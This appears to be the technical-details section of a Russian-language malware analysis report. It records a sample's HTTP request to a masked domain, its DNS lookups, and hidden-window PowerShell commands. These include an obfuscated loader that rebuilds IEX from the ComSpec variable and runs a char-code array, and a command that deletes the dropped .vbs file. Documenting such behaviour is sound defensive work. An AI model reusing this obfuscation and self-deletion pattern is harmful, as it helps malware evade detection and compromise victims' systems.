Техническая информация
- http://of#######eaner-commander.com/track.jpg
- DNS ASK google.com
- DNS ASK of#######eaner-commander.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $cd=$env:cOmsPec[4,26,25]-jOin'';sal mj $cd;$fvn5uhreyi3h4utj43u5j=@(36,84,98,111,110,101,61,39,42,69,88,39,46,114,101,112,108,97,99,101,40,39,42,39,44,39,73,39,41,59,115,97,108,32,77,32,36,84,...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Remove-Item '<PATH_SAMPLE>.vbs'' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $cd=$env:cOmsPec[4,26,25]-jOin'';sal mj $cd;$fvn5uhreyi3h4utj43u5j=@(36,84,98,111,110,101,61,39,42,69,88,39,46,114,101,112,108,97,99,101,40,39,42,39,44,39,73,39,41,59,115,97,108,32,77,32,36,84,...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Remove-Item '<PATH_SAMPLE>.vbs'